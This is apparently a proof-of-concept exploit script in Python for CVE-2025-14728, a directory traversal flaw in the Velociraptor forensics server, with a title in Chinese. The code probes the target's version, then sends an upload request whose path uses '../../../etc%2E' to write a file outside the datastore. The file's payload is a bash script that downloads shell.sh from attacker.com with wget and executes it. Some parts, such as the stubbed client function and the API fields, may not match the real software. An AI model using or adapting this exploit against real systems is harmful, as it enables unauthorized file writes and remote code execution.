CVE-2025-14728: Rapid7 Velociraptor目录遍历漏洞

# CVE-2025-14728 PoC - Velociraptor Directory Traversal # This PoC demonstrates the directory traversal vulnerability in Velociraptor # where filenames ending with '.' can bypass path sanitization import requests import urllib.parse import base64 # Target Velociraptor server TARGET_URL = "http://target-velociraptor-server:8000" def create_malicious_client(): """Create a malicious Velociraptor client configuration""" # Generate a client with crafted certificate client_id = "C.1234567890abcdef" return client_id def exploit_directory_traversal(): """ Exploit the directory traversal vulnerability by uploading a file to a path outside the datastore directory. The key is to use a directory name ending with '.' which only gets encoded as %2E for the final '.' """ # Craft the malicious upload path # Target: /etc/ (directory ending with %2E) # The path traversal sequence: ../../../etc%2E # This resolves to: ../../../etc. malicious_path = "../../../etc%2E" # File content to write (e.g., a cron job or SSH key) malicious_content = b"""#!/bin/bash # Malicious payload /usr/bin/wget http://attacker.com/shell.sh -O /tmp/shell.sh chmod +x /tmp/shell.sh /tmp/shell.sh """ # Encode the content encoded_content = base64.b64encode(malicious_content).decode() # Prepare the upload request upload_request = { "client_id": create_malicious_client(), "path": malicious_path, "filename": "malicious_file", "content": encoded_content, "operation": "UploadFile" } # Send the exploit request try: response = requests.post( f"{TARGET_URL}/api/v1/upload", json=upload_request, verify=False, timeout=30 ) if response.status_code == 200: print("[+] File uploaded successfully via directory traversal!") print(f"[+] File written to path containing: {malicious_path}") else: print(f"[-] Upload failed: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def verify_vulnerability(): """Verify if the target is vulnerable""" # Check Velociraptor version endpoint version_url = f"{TARGET_URL}/api/v1/version" try: response = requests.get(version_url, timeout=10) if response.status_code == 200: version_info = response.json() version = version_info.get('version', 'unknown') print(f"[*] Detected Velociraptor version: {version}") # Check if version is vulnerable major, minor, patch = map(int, version.split('.')[:3]) if major < 0 or (major == 0 and minor < 75) or (major == 0 and minor == 75 and patch < 6): print("[!] Target is VULNERABLE to CVE-2025-14728") return True else: print("[+] Target is NOT vulnerable (version >= 0.75.6)") return False except Exception as e: print(f"[-] Version check failed: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-14728 Velociraptor Directory Traversal Exploit") print("=" * 60) # First verify if target is vulnerable is_vulnerable = verify_vulnerability() if is_vulnerable: print("\n[*] Launching exploit...") exploit_directory_traversal() else: print("\n[!] Cannot proceed - target may not be vulnerable")